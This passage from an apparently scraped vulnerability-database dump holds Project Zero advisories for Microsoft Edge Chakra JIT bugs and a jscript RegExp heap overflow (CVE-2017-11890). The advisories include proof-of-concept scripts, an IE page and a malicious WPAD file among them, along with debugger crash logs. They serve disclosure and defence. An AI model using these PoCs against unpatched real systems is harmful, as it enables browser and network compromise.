rel=\"nofollow\">r15</a>=0000000000000000 \niopl=0 nv up ei pl nz na po nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 \njscript!RegExpFncObj::LastParen+0x43: \n000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=???????? \n \n0:014> k \n# Child-SP RetAddr Call Site \n00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43 \n01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5 \n02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873 \n03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373 \n04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162 \n05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3 \n06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea \n07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6 \n08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 \n09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7 \n0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e \n0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a \n0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267 \n0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56 \n0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 \n0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f \n10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9 \n11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283 \n12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101 \n13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235 \n14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90 \n15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb \n16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f \n17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70 \n18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1 \n19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 \n1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41 \n1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240 \n1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150 \n1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad \n1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5 \n1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 \n20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3 \n21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f \n22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f \n23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd \n24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d \n \n========================================= \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: ifratric \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145483/GS20171219055214.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT BackwardPass::RemoveEmptyLoopAfterMemOp Failed Insert", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11909"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145782", "href": "https://packetstormsecurity.com/files/145782/Microsoft-Edge-Chakra-JIT-BackwardPass-RemoveEmptyLoopAfterMemOp-Failed-Insert.html", "sourceData": "`Microsoft Edge: Chakra: JIT: BackwardPass::RemoveEmptyLoopAfterMemOp doesn't insert branches. \n \nCVE-2017-11909 \n \n \nThe optimizations for memory operations may leave empty loops as follows: \n \nfor (let i = 0; i < arr.length; i++) { \narr[i] = 0; \n} \n \nBecomes: \n \nMemset(arr, 0, arr.length); \nfor (let i = 0; i < arr.length; i++) { \n// empty! \n} \n \nThese empty loops will be removed by \"BackwardPass::RemoveEmptyLoopAfterMemOp\". But this method just removes them without considering branches. \n \nHere's what may happen. \n \nA: \nMemset(arr, 0, arr.length); \n \nfor (let i = 0; i < arr.length; i++) { \n \n} \ngoto D; // Actually, this's a \"BrGe_I4\" instruction in the PoC. \n \nC: \n... \n \nD: \n... \n \nBecomes: \n \nA: \nMemset(arr, 0, arr.length); \n \nC: \n... \n \nD: \n... \n \nSo, this may break the control flow. \n \n \nPoC: \nfunction opt(a, b, always_true = true) { \na[0] = 1234; \nb[0] = 0; \n \nlet arr = a; \nif (always_true) { \narr = b; \nfor (let i = 0; i < arr.length; i++) \narr[i] = 0; \n} \n \nlet val = arr[0]; \nif (val) { \nprint(val); // Must be 0, but prints out 1234 \nreturn true; \n} \n \nreturn false; \n} \n \nlet a = new Uint32Array(1); \nlet b = new Uint32Array(0x1000); \nfor (let i = 0; i < 10000; i++) { \nif (opt(a, b)) { \nbreak; \n} \n} \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145782/GS20180110004153.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-10T08:22:00", "description": "", "cvss3": {}, "published": "2018-01-10T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JIT asm.js Out-Of-Bounds Read", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11911"], "modified": "2018-01-10T00:00:00", "id": "PACKETSTORM:145783", "href": "https://packetstormsecurity.com/files/145783/Microsoft-Edge-Chakra-JIT-asm.js-Out-Of-Bounds-Read.html", "sourceData": "`Microsoft Edge: Chakra: OOB read in asm.js \n \nCVE-2017-11911 \n \n \nHere's a snippet of AsmJSByteCodeGenerator::EmitAsmJsFunctionBody. \nAsmJsVar * initSource = nullptr; \nif (decl->sxVar.pnodeInit->nop == knopName) \n{ \nAsmJsSymbol * initSym = mCompiler->LookupIdentifier(decl->sxVar.pnodeInit->name(), mFunction); \nif (initSym->GetSymbolType() == AsmJsSymbol::Variable) \n{ \n// in this case we are initializing with value of a constant var \ninitSource = initSym->Cast<AsmJsVar>(); \n} \n... \n} \n... \nif (initSource) \n{ \nif (var->GetType().isDouble()) \n{ \nmWriter.AsmReg2(Js::OpCodeAsmJs::Ld_Db, var->GetLocation(), mFunction->GetConstRegister<double>(initSource->GetDoubleInitialiser())); \n} \n \nChakra thinks the PoC is valid asm.js code. What happens when the variable \"b\" gets initialized is: \n1. mCompiler->LookupIdentifier is called with \"a\" as the first argument. And it returns the local variable \"a\", which is of type int, but not the double constant \"a\". \n2. mFunction->GetConstRegister fails to find the int value in the double constant table. So it returns -1 which leads OOB read. \n \nPoC: \nfunction createModule() { \n'use asm'; \nconst a = 1.0; \nfunction f() { \nvar b = a; \nvar a = 0; \n} \n \nreturn f; \n} \nvar f = createModule(); \nf(); \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145783/GS20180110004307.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-18T08:21:19", "description": "", "cvss3": {}, "published": "2018-01-17T00:00:00", "type": "packetstorm", "title": "Microsoft Edge Chakra JavascriptGeneratorFunction::GetPropertyBuiltIns Exposure", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11914"], "modified": "2018-01-17T00:00:00", "id": "PACKETSTORM:145950", "href": "https://packetstormsecurity.com/files/145950/Microsoft-Edge-Chakra-JavascriptGeneratorFunction-GetPropertyBuiltIns-Exposure.html", "sourceData": "`Microsoft Edge: Chakra: JavascriptGeneratorFunction::GetPropertyBuiltIns exposes scriptFunction \n \nCVE-2017-11914 \n \n \nHere's a snippet of the method. \nbool JavascriptGeneratorFunction::GetPropertyBuiltIns(Var originalInstance, PropertyId propertyId, Var* value, PropertyValueInfo* info, ScriptContext* requestContext, BOOL* result) \n{ \nif (propertyId == PropertyIds::length) \n{ \n... \nint len = 0; \nVar varLength; \nif (scriptFunction->GetProperty(scriptFunction, PropertyIds::length, &varLength, NULL, requestContext)) \n{ \nlen = JavascriptConversion::ToInt32(varLength, requestContext); \n} \n... \nreturn true; \n} \n \nreturn false; \n} \n \n\"JavascriptGeneratorFunction\" is like a wrapper class used to ensure the arguments for \"scriptFunction\". So \"scriptFunction\" must not be exposed to user JavaScript code. But the vulnerable method exposes \"scriptFunction\" as \"this\" when getting the \"length\" property. \n \nThe code should be like: \"scriptFunction->GetProperty(this, PropertyIds::length, &varLength, NULL, requestContext);\" \n \nType confusion PoC: \nfunction* f() { \n} \n \nlet g; \nf.__defineGetter__('length', function () { \ng = this; // g == \"scriptFunction\" \n}); \n \n \nf.length; \n \ng.call(0x1234, 0x5678); // type confusion \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available, the bug report will become \nvisible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/145950/GS20180118040348.txt", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-19T15:33:34", "description": "", "cvss3": {}, "published": "2017-12-18T00:00:00", "type": "packetstorm", "title": "Microsoft Windows jscript!RegExpComp::Compile Heap Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-18T00:00:00", "id": "PACKETSTORM:145479", "href": "https://packetstormsecurity.com/files/145479/Microsoft-Windows-jscript-RegExpComp-Compile-Heap-Overflow.html", "sourceData": "`Windows: Heap overflow in jscript!RegExpComp::Compile through IE or local network via WPAD \n \nCVE-2017-11890 \n \n \nThere is a heap overflow in jscript.dll when compiling a regex. This issue could potentially be exploited through multiple vectors: \n \n- An attacker on the local network could exploit this issue by posing as a WPAD (Web Proxy Auto-Discovery) host and sending a malicious wpad.dat file to the victim. This works because wpad.dat files are JavaScript files interpreted with jscript.dll on the WPAD client. Note that, in this case, an attacker who successfully exploited the vulnerability would gain the same privileges as the WinHTTP Web Proxy Auto-Discovery Service. \n \n- The issue can also be exploited by opening a malicious web page in Internet Explorer. In this case, due to the sizes involved, a 64-bit tab process would most likely be required to trigger the issue. This is going to be the case for example when running IE in the Enhanced Protected Mode. \n \nThe issue has been verified on 64-bit Win7 and 64-bit Win10 with the most recent patches applied. \n \nPoC for Internet Explorer: \n \n============================================ \n \n \n<html> \n<head> \n<meta http-equiv=\"X-UA-Compatible\" content=\"IE=8\"></meta> \n</head> \n<body> \n<script language=\"Jscript.Encode\"> \n \nvar s = 'a'; \nfor(var i=0;i<28;i++) { \ns = s+s; \n} \ns = s+'[a-z]'+s; \n \nr = new RegExp(); \nr.compile(s); \n \n</script> \n</body> \n</html> \n \n============================================ \n \nPoC for WPAD: \n \n============================================ \n \nfunction FindProxyForURL(url, host) { \n \nvar s = 'a'; \nfor(var i=0;i<28;i++) { \ns = s+s; \n} \ns = s+'[a-z]'+s; \n \nr = new RegExp(); \nr.compile(s); \n \nreturn \"DIRECT\"; \n} \n \n=========================================== \n \nTechnical details: \n \nThe issue is in RegExpComp::Compile (and several functions called from RegExpComp::Compile). RegExpComp::Compile is responsible for compiling a RegExp object. It maintains a buffer with the compilation result and extends it when necessary. Extending the buffer is handled using RegExpBase::EnsureSpace which looks (approximately) like: \n \nvoid RegExpBase::EnsureSpace(int desired_size) { \nif(desired_size > buffer_size) { \nif(2 * desired_size < desired_size) { \n//throw an exception \n} \nint new_size = 2 * desired_size; \nchar * new_buffer = realloc(buffer, new_size); \nif(!new_buffer) { \n//throw an exception \n} \nbuffer = new_buffer; \nbuffer_size = new_size; \n} \n} \n \nNote that desired_size is a signed 32-bit integer. RegExpBase::EnsureSpace has an integer overflow check, however if an overflow happens in the caller (a caller must add the size which it wants to append to the existing content size) and desired_size becomes negative, RegExpBase::EnsureSpace would simply return because of the first if() statement without attempting to extend the buffer. \n \nIndeed, integer overflows can happen in the several callers of RegExpBase::EnsureSpace. The one being triggered in the PoC is in RegExpComp::Compile, when it attempts to append the raw input string to the buffer towards the end of the compilation process. \n \nDebug log (from IE, but it looks similar in the WPAD service): \n \n============================================ \n \n(b90.698): Access violation - code c0000005 (first chance) \nFirst chance exceptions are reported before any exception handling. \nThis exception may be expected and handled. \nmsvcrt!memcpy+0x1d9: \n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=???? \n \n0:012> r \nrax=0000000040000061 rbx=00000000042b7ea0 rcx=000000025bb60fe0 \nrdx=fffffffdfa4b0010 rsi=00000000042b5f48 rdi=000000004000000a \nrip=000007fefefe123d rsp=0000000012399ef8 rbp=0000000012399f28 \n<a href=\"https://crrev.com/8\" title=\"\" class=\"\" rel=\"nofollow\">r8</a>=0000000040000008 <a href=\"https://crrev.com/9\" title=\"\" class=\"\" rel=\"nofollow\">r9</a>=0000000000000000 <a href=\"https://crrev.com/10\" title=\"\" class=\"\" rel=\"nofollow\">r10</a>=6100610061006100 \n<a href=\"https://crrev.com/11\" title=\"\" class=\"\" rel=\"nofollow\">r11</a>=000000021bb60fd8 <a href=\"https://crrev.com/12\" title=\"\" class=\"\" rel=\"nofollow\">r12</a>=0000000016010fe8 <a href=\"https://crrev.com/13\" title=\"\" class=\"\" rel=\"nofollow\">r13</a>=000007feebc91670 \n<a href=\"https://crrev.com/14\" title=\"\" class=\"\" rel=\"nofollow\">r14</a>=0000000020000001 <a href=\"https://crrev.com/15\" title=\"\" class=\"\" rel=\"nofollow\">r15</a>=0000000000000000 \niopl=0 nv up ei pl nz na pe nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 \nmsvcrt!memcpy+0x1d9: \n000007fe`fefe123d 668901 mov word ptr [rcx],ax ds:00000002`5bb60fe0=???? \n \n0:012> k \n# Child-SP RetAddr Call Site \n00 00000000`12399ef8 000007fe`ebc88bb3 msvcrt!memcpy+0x1d9 \n01 00000000`12399f00 000007fe`ebcfacc2 jscript!RegExpComp::Compile+0x1b7 \n02 00000000`12399f60 000007fe`ebce2118 jscript!RegExpComp::CompileDynamic+0x62 \n03 00000000`12399fa0 000007fe`ebce3310 jscript!RegExpObj::Compile+0x32c \n04 00000000`1239a0f0 000007fe`ebc7c2ec jscript!JsRegExpCompile+0x70 \n05 00000000`1239a140 000007fe`ebc7a9fe jscript!NatFncObj::Call+0x138 \n06 00000000`1239a1f0 000007fe`ebc7b234 jscript!NameTbl::InvokeInternal+0x3f8 \n07 00000000`1239a310 000007fe`ebc79852 jscript!VAR::InvokeByName+0x81c \n08 00000000`1239a520 000007fe`ebc79929 jscript!VAR::InvokeDispName+0x72 \n09 00000000`1239a5a0 000007fe`ebc724b8 jscript!VAR::InvokeByDispID+0x1229 \n0a 00000000`1239a5f0 000007fe`ebc78ec2 jscript!CScriptRuntime::Run+0x5a6 \n0b 00000000`1239b3f0 000007fe`ebc78d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162 \n0c 00000000`1239b600 000007fe`ebc78b95 jscript!ScrFncObj::Call+0xb7 \n0d 00000000`1239b6a0 000007fe`ebc7e6c0 jscript!CSession::Execute+0x19e \n0e 00000000`1239b770 000007fe`ebc870e7 jscript!COleScript::ExecutePendingScripts+0x17a \n0f 00000000`1239b840 000007fe`ebc868d6 jscript!COleScript::ParseScriptTextCore+0x267 \n10 00000000`1239b930 000007fe`ecdf5251 jscript!COleScript::ParseScriptText+0x56 \n11 00000000`1239b990 000007fe`ed57b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1 \n12 00000000`1239ba10 000007fe`ecdf6256 MSHTML!CScriptCollection::ParseScriptText+0x37f \n13 00000000`1239baf0 000007fe`ecdf5c8e MSHTML!CScriptData::CommitCode+0x3d9 \n14 00000000`1239bcc0 000007fe`ecdf5a11 MSHTML!CScriptData::Execute+0x283 \n15 00000000`1239bd80 000007fe`ed5b46fb MSHTML!CHtmScriptParseCtx::Execute+0x101 \n16 00000000`1239bdc0 000007fe`ece98a5b MSHTML!CHtmParseBase::Execute+0x235 \n17 00000000`1239be60 000007fe`ecd72e39 MSHTML!CHtmPost::Broadcast+0x90 \n18 00000000`1239bea0 000007fe`ecdccaef MSHTML!CHtmPost::Exec+0x4bb \n19 00000000`1239c0b0 000007fe`ecdcca40 MSHTML!CHtmPost::Run+0x3f \n1a 00000000`1239c0e0 000007fe`ecdcda12 MSHTML!PostManExecute+0x70 \n1b 00000000`1239c160 000007fe`ecdd0843 MSHTML!PostManResume+0xa1 \n1c 00000000`1239c1a0 000007fe`ecdb6fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43 \n1d 00000000`1239c1f0 000007fe`ed5e4f78 MSHTML!CDwnChan::OnMethodCall+0x41 \n1e 00000000`1239c220 000007fe`eccd9d75 MSHTML!GlobalWndOnMethodCall+0x240 \n1f 00000000`1239c2c0 00000000`77229bbd MSHTML!GlobalWndProc+0x150 \n20 00000000`1239c340 00000000`772298c2 USER32!UserCallWinProcCheckWow+0x1ad \n21 00000000`1239c400 000007fe`f29d4a87 USER32!DispatchMessageWorker+0x3b5 \n22 00000000`1239c480 000007fe`f29dbabb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555 \n23 00000000`1239f700 000007fe`fd73572f IEFRAME!LCIETab_ThreadProc+0x3a3 \n24 00000000`1239f830 000007fe`ee62925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f \n25 00000000`1239f860 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f \n26 00000000